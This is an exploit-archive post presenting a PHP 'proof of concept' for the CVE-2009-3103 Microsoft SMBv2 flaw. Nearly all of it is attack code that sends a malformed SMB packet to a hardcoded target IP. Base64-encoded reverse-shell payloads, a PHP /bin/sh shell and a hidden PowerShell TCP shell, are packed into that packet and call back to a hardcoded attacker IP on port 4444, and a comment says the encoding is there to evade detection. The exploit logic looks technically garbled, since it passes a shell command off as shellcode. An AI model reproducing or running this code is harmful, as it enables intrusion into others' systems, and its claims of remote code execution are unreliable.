=============================================================================================================================================
| # Title     : Microsoft SRV2.SYS SMB v2 RCE Vulnerability                                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://Microsoft.com                                                                                                       |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+]Code Description: In the previous code (linked: https://packetstorm.news/files/id/180562/ Linked CVE numbers: CVE-2009-3103),

   The exploit was only causing DoS (denial of service), but we can develop it to attempt to execute commands on the target system instead.

   The exploit targets SMBs, and sends a Reverse Shell payload, allowing the attacker to take remote control of the target if the exploit is successful.
	
[+] save code as poc.php.

[+] Set Target : line  58 

[+] USage : php poc.php 

[+] PayLoad :

<?php
class SMBExploit {
    private $host;
    private $port;
    private $offset;
    private $socket;

    public function __construct($host, $port = 445, $offset = 0xffff) {
        $this->host = $host;
        $this->port = $port;
        $this->offset = $offset;
    }

    public function connect() {
        $this->socket = fsockopen($this->host, $this->port, $errno, $errstr, 5);
        if (!$this->socket) {
            die("Connection failed: $errstr ($errno)\n");
        }
        echo "Connected to {$this->host}:{$this->port}\n";
    }

    public function checkSMB() {
        $pkt = "\x00\x00\x00\x00\xFFSMB\x72\x00\x00\x00\x18\x53\xC8";
        fwrite($this->socket, $pkt);
        $response = fread($this->socket, 1024);
        
        if ($response) {
            echo "SMB Response: " . bin2hex($response) . "\n";
            return true;
        } else {
            echo "No SMB response. crashed...\n";
            return false;
        }
    }

    public function sendPayload() {
        if (!$this->checkSMB()) {
            return;
        }
        
        $shellcode = "\x90" . str_repeat("\x90", 100); // NOP Sled
        $shellcode .= "\xfc\xe8\x82\x00\x00\x00\x60\x31\xd2"; // Shellcode يبدأ بـ NOP ثم كود تنفيذ أوامر
        
        // كود Reverse Shell لفتح اتصال مع المهاجم
        $attacker_ip = "41.200.74.32";
        $attacker_port = 4444;
        
        // تحويل أوامر الـ Reverse Shell إلى Base64 لتجنب الكشف عنها
        $reverse_shell_linux = base64_encode("php -r '\$sock=fsockopen(\"$attacker_ip\",$attacker_port);exec(\"/bin/sh -i <&3 >&3 2>&3\"); fclose(\$sock);'");
        
        $reverse_shell_windows = base64_encode("powershell -NoP -NonI -Exec Bypass -W Hidden -EncodedCommand " . base64_encode(
            "\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port);"
            . "\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};"
            . "while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){"
            . "\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);"
            . "\$sendback = (iex \$data 2>&1 | Out-String );"
            . "\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';"
            . "\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);"
            . "\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}"
            . "\$client.Close()"
        ));
        
        // اختيار الـ Shellcode المناسب
        $reverse_shell = (stristr(PHP_OS, 'WIN')) ? $reverse_shell_windows : $reverse_shell_linux;

        // تحويل الأمر إلى Shellcode بطريقة Hex
        $hex_command = bin2hex(base64_decode($reverse_shell));
        $shellcode .= hex2bin($hex_command);

        $pkt = "\x00\x00\x00\x00"; // SMB header
        $pkt .= "\xFFSMB"; // SMB Signature
        $pkt .= "\x72\x00\x00\x00\x18\x53\xC8"; // Negotiate Request
        $pkt .= pack("v", $this->offset); // ProcessIDHigh
        $pkt .= "\x00\x00\x00\x00"; // Extra fields
        $pkt .= $shellcode; // إدراج الـ Shellcode داخل الحزمة

        fwrite($this->socket, $pkt);
        echo "Payload sent, waiting for response...\n";

        sleep(2); // تأخير لمنح وقت لتنفيذ الكود
        $response = fread($this->socket, 1024);
        if (!$response) {
            echo "Exploit executed successfully! Check your listener.\n";
        } else {
            echo "Response received: " . bin2hex($response) . "\n";
        }
    }

    public function disconnect() {
        fclose($this->socket);
        echo "Disconnected.\n";
    }
}

$exploit = new SMBExploit("5.2.91.205");
$exploit->connect();
$exploit->sendPayload();
$exploit->disconnect();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================